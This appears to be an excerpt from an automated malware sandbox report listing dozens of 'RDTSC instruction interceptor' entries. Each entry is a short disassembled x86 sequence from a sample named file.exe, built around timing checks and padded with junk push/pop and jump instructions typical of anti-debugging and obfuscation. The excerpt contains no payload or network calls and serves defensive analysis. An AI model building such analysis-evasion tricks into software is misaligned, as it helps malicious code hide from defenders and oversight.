                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD04B9 second address: CD0514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7981407BF5h 0x0000000a jmp 00007F7981407BEFh 0x0000000f popad 0x00000010 nop 0x00000011 stc 0x00000012 lea eax, dword ptr [ebp+12485250h] 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F7981407BE8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 pushad 0x00000033 mov eax, dword ptr [ebp+122D2A36h] 0x00000039 clc 0x0000003a popad 0x0000003b stc 0x0000003c nop 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 jbe 00007F7981407BE6h 0x00000046 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0514 second address: CD0536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F7980D061BCh 0x0000000c popad 0x0000000d push eax 0x0000000e je 00007F7980D061C8h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F7980D061B6h 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0536 second address: CAF00E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7981407BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call dword ptr [ebp+122D3127h] 0x00000011 pushad 0x00000012 jp 00007F7981407BE8h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7981407BF2h 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD060E second address: CD0613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0613 second address: CD062C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7981407BE8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jns 00007F7981407BE6h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD09E4 second address: CD09EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0B8C second address: CD0BA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0BA7 second address: CD0BDC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7980D061C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 594B6864h 0x00000011 sub dword ptr [ebp+1246FC14h], eax 0x00000017 call 00007F7980D061B9h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0D3A second address: CD0D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 jmp 00007F7981407BF3h 0x0000000c mov ecx, dword ptr [ebp+122D17EFh] 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F7981407BEAh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0D6A second address: CD0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0D6F second address: CD0DBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F7981407BF6h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7981407BF7h 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0DBD second address: CD0DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0E54 second address: CD0ECD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7981407BF1h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jnp 00007F7981407BFBh 0x00000019 jmp 00007F7981407BF5h 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 jmp 00007F7981407BF1h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F7981407BF6h 0x0000002d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0ECD second address: CD0ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1168 second address: CD118D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7981407BECh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F7981407BECh 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1486 second address: CD14F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F7980D061B8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 mov cl, bh 0x00000024 sub dword ptr [ebp+1246F0B8h], eax 0x0000002a push 0000001Eh 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F7980D061B8h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 movzx edi, dx 0x00000049 ja 00007F7980D061BCh 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD14F4 second address: CD14FE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7981407BE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD14FE second address: CD1504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1504 second address: CD1508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1508 second address: CD150C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD192A second address: CD192E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD192E second address: CAFA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 js 00007F7980D061B8h 0x0000000f mov ecx, ebx 0x00000011 call dword ptr [ebp+122D18BAh] 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jl 00007F7980D061B6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAFA96 second address: CAFA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87F21 second address: C87F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7980D061B6h 0x0000000a pop edi 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87F2C second address: C87F35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D00BAC second address: D00BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7980D061B6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D00BBA second address: D00BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D00BBF second address: D00BD2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7980D061BEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D00D17 second address: D00D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01542 second address: D01548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01548 second address: D0154E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0154E second address: D01557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01557 second address: D0155D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0155D second address: D01561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D01561 second address: D01567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05AF0 second address: D05B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F7980D061C3h 0x0000000c pop esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05B10 second address: D05B1B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05F1B second address: D05F3D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7980D061CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05F3D second address: D05F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7981407BE6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05F47 second address: D05F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05F4B second address: D05F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F7981407BF3h 0x00000010 jmp 00007F7981407BEAh 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D060A2 second address: D060B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7980D061BBh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D063C1 second address: D063DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7981407BF9h 0x00000009 pop ebx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05521 second address: D05527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D05527 second address: D0552B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0552B second address: D0554F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7980D061B6h 0x00000008 jns 00007F7980D061B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F7980D061C0h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0554F second address: D05553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C89948 second address: C8997B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C1h 0x00000007 jmp 00007F7980D061C9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8997B second address: C899AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7981407BE6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007F7981407BF2h 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop ecx 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a je 00007F7981407BE6h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 popad 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F0D9 second address: D0F125 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7980D061CCh 0x00000008 je 00007F7980D061BCh 0x0000000e jns 00007F7980D061B6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jp 00007F7980D061BCh 0x0000001d pushad 0x0000001e push esi 0x0000001f pop esi 0x00000020 jnl 00007F7980D061B6h 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 popad 0x00000029 pushad 0x0000002a push edi 0x0000002b pop edi 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F125 second address: D0F12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78EA9 second address: C78EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78EAF second address: C78EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78EB4 second address: C78ECA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F7980D061B6h 0x00000009 jns 00007F7980D061B6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78ECA second address: C78ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D11E5F second address: D11E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7980D061C0h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D11E73 second address: D11E79 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D11E79 second address: D11E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1469F second address: D146A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D146A4 second address: D146C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7980D061B6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7980D061C2h 0x00000012 jnl 00007F7980D061B6h 0x00000018 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B699 second address: D1B6A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7981407BE6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A418 second address: D1A41E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A41E second address: D1A422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A422 second address: D1A42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A42F second address: D1A445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F7981407BEFh 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A445 second address: D1A452 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F7980D061B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A452 second address: D1A460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F7981407BE6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A460 second address: D1A466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A62B second address: D1A631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD12B0 second address: CD1312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or cl, FFFFFF81h 0x0000000f mov ebx, dword ptr [ebp+1248528Fh] 0x00000015 or ch, FFFFFFEAh 0x00000018 mov ecx, dword ptr [ebp+122D2A2Eh] 0x0000001e add eax, ebx 0x00000020 jl 00007F7980D061D3h 0x00000026 call 00007F7980D061C6h 0x0000002b jnl 00007F7980D061B6h 0x00000031 pop edx 0x00000032 nop 0x00000033 pushad 0x00000034 jl 00007F7980D061B8h 0x0000003a push edi 0x0000003b pop edi 0x0000003c push eax 0x0000003d push edx 0x0000003e jp 00007F7980D061B6h 0x00000044 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1312 second address: CD1316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1316 second address: CD1369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jl 00007F7980D061B6h 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F7980D061B8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d add dword ptr [ebp+122D305Ah], edx 0x00000033 push 00000004h 0x00000035 mov dword ptr [ebp+1246F0B8h], edi 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F7980D061C1h 0x00000043 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1369 second address: CD1370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A778 second address: D1A7D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7980D061BDh 0x00000009 jmp 00007F7980D061C4h 0x0000000e jo 00007F7980D061B6h 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F7980D061BBh 0x0000001b push eax 0x0000001c pop eax 0x0000001d push edx 0x0000001e pop edx 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F7980D061BEh 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 popad 0x0000002a jo 00007F7980D061DCh 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 pop eax 0x00000034 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B3E1 second address: D1B404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7981407BF8h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20084 second address: D2009D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7980D061BEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F392 second address: D1F396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F396 second address: D1F3A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7980D061BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F3A4 second address: D1F3C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7981407BF5h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F7EE second address: D1F7FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F7980D061BEh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F99F second address: D1F9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1FC8A second address: D1FC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8B38F second address: C8B395 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22729 second address: D2272E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2272E second address: D22750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7981407BE6h 0x0000000a jmp 00007F7981407BF0h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D29040 second address: D29044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
